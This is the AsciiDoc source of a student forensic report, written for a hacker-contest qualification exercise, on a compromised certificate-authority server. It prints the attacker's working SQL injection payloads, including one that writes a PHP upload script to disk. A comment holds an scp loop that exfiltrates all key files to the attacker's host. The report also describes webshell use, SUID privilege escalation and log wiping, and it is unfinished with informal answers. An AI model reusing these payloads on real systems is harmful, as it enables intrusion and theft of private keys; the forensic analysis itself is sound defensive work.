:doctype: book
:imagesdir: images
:stylesheet: paper.css
// Disable generating an update label at the bottom of the doc.
:last-update-label!:
// Setup highlight.js to use a local version with a local stylesheet
:source-highlighter: highlight.js
:highlightjs-theme: thesis
:highlightjsdir: libraries/highlightjs
// Enable rendering math equations
:stem:
// Generate a table of contents at the toc macro
// Also disabling section numbers for now, as we only start numbering after the toc. See the macros there
:toc: macro
:toclevels: 3
:sectanchors:
// Disable the title page
// We will build the title page manually for maximum flexibility
:notitle:
:title-page: false
// Refer to things like "Figure 1" instead of by their name
:xrefstyle: short
// Prefetch and inline diagrams with kroki but not in vscode
ifndef::env-vscode[]
:kroki-fetch-diagram: true
:kroki-default-options: inline
endif::env-vscode[]

image::../assets/logo_hda.svg[role=logo]

[.university.text-center]
Darmstadt University of Applied Sciences

[.faculty.text-center]
Faculty of Computer Science

[discrete#main-title]
= Compromised Server Investigation Report

[.description.text-center]
Qualification exercise

[.presented-by.text-center]
by +
*Lennart Eichhorn* +
[small]+Matriculation number: 759253+ +
[small]+Email: lennart.eichhorn@stud.h-da.de+


toc::[]

:part-signifier: Part
:sectnums:
:listing-caption: Listing
:partnums:

// Main part starts here
[.reset-pages]
= Forensic Investigation Report

== Introduction

A small company hired an IT consultant to generate certificates for various services. As soon as the consultant completed the work and left the building, the Intrusion Detection System (IDS) used in the company detected an attack on the server set up specifically for this purpose. Concerned about the security of the generated certificates, the company requests a forensic investigation of the server to determine whether there has been an attack on the system and, if so, what data has been stolen from the system. Any information that can be found about the attacker is also of importance.

The server itself has the IP address `192.168.0.1`. The consultant used the username `root` and either worked directly on the computer or from the addresses `192.168.5.23`` and `192.168.23.5``. Otherwise, no one else should have had access to the computer. The consultant set up the computer in the morning and generated the certificates. Immediately afterward, he left the premises. Shortly thereafter, the IDS system reported the attack.

=== Objectives

// Aus dem Bericht sollen die gefundenen Angriffsdetails und Schwachstellen hervorgehen. Hierfür ist eine Aufzählung in Form von Stichpunkten ausreichend
Our main objectives are to determine the details of the attack and any vulnerabilities that were exploited. We want to answer the following questions:

.Questions
* Should the certificates still be used?
* Can the system still be used?
* How did the attacker get into the system?
* What did the attacker do?
* What has to be done to secure the system?
* Which details about the attacker can be found?

.Additional Questions
* Is the configuration of the server secure?
* Should a CA be operated in this manner?
* How should the software written by the consulatant be assessed?

=== Acquired data

.Compromised server disk image
[cols="1,1"]
|===
|Attribute |Detailed Information

|Filename
|HDD.raw

|sha256sum
|9ad970f9df238dc266f58f17689d4049ab40e5c10296a3ff0620ba95612f166c

|Size (bytes)
|1.00 GiB (1,073,741,824 bytes)

|Date of acquisition
|Unknown

|Aquired by
|Customer

|Description
|The disk image was created by the customer and handed over to the investigator
|===

.Basic server information
Hostnames:: caserver.smallcompany.local caserver localhost.localdomain localhost
Operating System::  Alpine Linux v3.2.3
motd:: Welcome to our PKI management server
nameserver:: 192.168.1.7
timezone:: UTC

=== Suspect information

Name:: Peter
Username:: peter
IP:: 192.168.223.223
Tools:: Nikto sqlmap c99
Hostname:: workstation5728484
SSH public key:: Shown in <<intruder-ssh-key>>

== Suspect action timeline

2015-09-25T06:41:16:: Consultant logs in for the first time from 192.168.23.5
Consultant set mysql root password to `password2015!`
2015-09-25T06:53:51:: Consultant creates cakey.pem
  Contains the private key of the CA
2015-09-25T06:55:32:: Consultant creates caroot.pem
2015-09-25T08:01:50:: Consultant creates the vulnerable `webserverCtrl.c` (<<webserverctrl>>)
2015-09-25T08:04:19:: Consultant builds and sets the SUID bit on `webServerCtrl`
2015-09-25T08:04:10:: Intruder started probing endpoints from 192.168.223.223
// Maybe usign nikto
2015-09-25T08:06:29:: Intruders tooling triggers the SQL injection vulnerability for the first time
2015-09-25T08:07:05:: Intruder started sqlmap using the discovered injection
// They probably get the whole database schema, not sure
2015-09-25T08:10:05:: Intruder confirmed SQL injection by placing `/var/www/localhost/htdocs/cache/test.csv`
2015-09-25T08:10:42:: Intruder tries to place upload.php to `/var/www/localhost/htdocs/upload.php` but that does not work
// Apparently did not work, but I am not sure why I did not work or how the attacker knew
2015-09-25T08:11:04:: Intruder placed `upload.php` to `/var/www/localhost/htdocs/cache/upload.php`
2015-09-25T08:11:12:: Intruder placed `c99.php` to `/var/www/localhost/htdocs/cache/c99.php`
2015-09-25T08:11:16:: Intruder starts using c99.php to run commands
2015-09-25T08:14:58:: Intruders notices 
2015-09-25T08:14:58:: Intruders obtains the source for webserverCtrl
2015-09-25T08:17:09:: Intruder verifies that webServerCtrl can be used to escalated to root.
2015-09-25T08:18:07:: Intruder starts a reverse shell as root using webServerCtrl.
2015-09-25T08:22:35:: Intruder adds their public key to the `/root/.ssh/authorized_keys`
2015-09-25T08:24:??:: Intruder logs in via SSH as root
2015-09-25T08:24:17:: Intruder exfiltrates `cakey.pem
2015-09-25T08:25:??:: Intruder fails tries but fails to exfiltrate any other key
// `for i in $(find . -name "*key.pem"); do scp $i peter@192.168.0.223.223:/home/peter/; done`
2015-09-25T08:28:56:: Intruder uploads possibly modified `ls` source code via upload.php
2015-09-25T08:33:33:: Intruder uploads possibly modified `ls` binary via upload.php
2015-09-25T08:30:54:: Intruder places working and possibly modified `ls` binary in `/bin/ls`
2015-09-25T08:31:04:: Intruder is listing .ssh, but doesnt do anything
2015-09-25T10:31:54:: Intruder deletes all the files they uploaded to `/var/www/localhost/htdocs/cache` Including upload.php
2015-09-25T08:32:28:: Intruder clears the `/var/logs/messages` log
2015-09-25T08:32:28:: Intruder clears the `/var/log/mysql/query.log` log
2015-09-25T08:32:28:: Intruder disconnects
2015-09-25T11:19:57:: Someone comes back to delete /var/www/localhost/htdocs/cache/c99.php and /tmp/ccnIANnf.c
2024-04-28T12:45:00:: Investigator receives the disk image

=== Intrusion

The attacker scanned the server using sqlmap
The form in `index.php` allows a SQL injection, because the inputs are not validated. The vulnerable line is shown in <<vulnerable-line>>. The attacker used that vulnerability to place a script called `upload.php` that allowed them to easily upload new files to the server. They proceeded by uploading c99.php, a webshell, to the server. Using c99.php they were able to execute commands as the `apache` user.

.The vulnerable line of code
[source#vulnerable-line,php]
----
$query = "SELECT subject FROM certs WHERE cert_id='" . $_POST['cert_id'] . "' LIMIT 1";
----

.First SQL injection
[source#first-sql-injection,sql]
----
1' OR 1=1 INTO OUTFILE '/var/www/localhost/htdocs/cache/test.csv' -- 
----

.Inserting the content of `upload.php` as a cert into the database
[source#fsecond-sql-injection,sql]
----
1'; INSERT INTO certs VALUES(523, "<?php if(isset($_FILES['tfile'])){     $file_name = $_FILES['tfile']['name'];     $file_tmp =$_FILES['tfile']['tmp_name'];     move_uploaded_file($file_tmp,$file_name);     echo 'Success'; } ?> <form action='' method='POST' enctype='multipart/form-data'>     <input type='file' name='tfile' />     <input type='submit'/> </form>"); -- 
----

.Create `upload.php`
[source#third-sql-injection,sql]
----
523' INTO OUTFILE '/var/www/localhost/htdocs/cache/upload.php' -- 
----

==== Privilege escalation

The intruder intially only had acces to the `apache` user. They managed to escalate their privileges by exploiting a vulnerability in the `webserverCtrl` program created by the consultant.

The `webserverCtrl` was used by the consultant to control the webserver from an unprivileged user. The C source is shown in <<webserverctrl>>. The program is supposed to use setuid to get root privileges and then allow the user to run one of two predefined commands as root. However a easily abusable buffer overflow vulnerability allows an attacker to abuse it to run arbitrary commands as root.

The attacker used this to start a reverse shell as root. They used the reverse shell to add their own SSH key to the authorized_keys file of the root user. Then they proceeded to login as root via SSH.

==== Hiding their tracks

The attacker tried to hide their tracks by delting some of their files and replacing the `ls` binary with a modified version that hides the authorized_keys file and the folder where they put the source code for `ls`. We were able to restore most of the deleted files.


// == Risk
// I did not work on any live data, so there is no risk of contaminating the evidence.


== Conclusion

=== Recommendations for securing the server

Delete everything and start from scratch

=== Questions

==== Should the certificates still be used?

The certificates should no longer be used, as the root key used to create the ca has certainly been compromised. We can not be certain that the attacker did not also exfiltrate the other certificates, so they should definitly not be used.

==== Can the system still be used?

No, the system should be wipe and reinstalled. Possibly by a another consultant.

While we are quite certain that the attacker is gone and we know of all activity they did, they might still have left backdoors that we did not find.

==== We know details about the attacker can be found?

We know that the attacker is named `peter`


==== What do you think of the configuration of the server?

Not that good.

==== What do I think about the software written by the consultant?

No. Just no.

==== Should a CA be operated in this manner?

Fuck, no!

// The head of the technology department not only expects a final report on the data but also desires a bullet-point list of suggestions for strengthening the server. Due to other ongoing projects, the server should not be rebuilt but rather utilized further. Is this advisable?
 
[glossary]
== List of abbreviations

[glossary]
[[IT]]IT:: Information Technology link:pass:[https://en.wikipedia.org/wiki/Information_technology][🔗^]
[[IDS]]IDS:: Intrusion Detection System link:pass:[https://en.wikipedia.org/wiki/Intrusion_detection_system][🔗^]
[[CA]]CA:: Certificate Authority link:pass:[https://en.wikipedia.org/wiki/Certificate_authority][🔗^]
[[PKI]]PKI:: Public Key Infrastructure link:pass:[https://en.wikipedia.org/wiki/Public_key_infrastructure][🔗^]
[[SSH]]SSH:: Secure Shell link:pass:[https://en.wikipedia.org/wiki/Secure_Shell][🔗^]

[bibliography]
== References

// Citation style:
// Line 1: All authors' full first and last names. Commas separate Authors.
// Line 2: Title in italics.
// Line 3: Journal/Conference name or any other information about what gives the source credibility.
// Line 4: doi with attached hyperlink. For digital editions, also link the PDF with a 📁 icon
// +Authors seperated by commas+

* [[[Goh24]]]
+Matthias Göhring, Tobias Hamann, Tim Wörner+ +
_Anmeldeaufgabe, Sommersemester 2024_ +
[Online; archived 17.4.2024] +
link:pass:[https://transfer.usd.de/index.php/s/ZPS9KT2NRsk42MA][transfer.usd.de/index.php/s/ZPS9KT2NRsk42MA^]
link:pass:[https://web.archive.org/web/20240417145559/https://transfer.usd.de/index.php/s/ZPS9KT2NRsk42MA/download/2024-04_Anmeldeaufgabe-hda-HackerContest-SoSe24.pdf][📁^]

== Appendix

.`upload.php` (formatted)
[source.linenums,rust]
----
include::disk-analysis/Export/index.php[]
----

.`webserverCtrl.c` (formatted)
[source#webserverctrl.linenums,c]
----
include::disk-analysis/Export/webserverCtrl.c[]
----

.SSH key of the intruder
[source#intruder-ssh-key.linenums,text]
----
include::disk-analysis/Export/authorized_keys[]
----

include::scripts/trailing-scripts.adoc[]

// Final checklist:
// * are all abbreviations defined?
// * are all abbreviations linked to Wikipedia (or somewhere else)?
// * are all references used?
// * are all references linked to the correct source?
// * are all TODOs processed?
// * are the names for things consistent?
// * check for broken references
// * archive.org all links
// * Check for duplication of information
// * oxford comma
// * You should have read the paper at least once from top to bottom.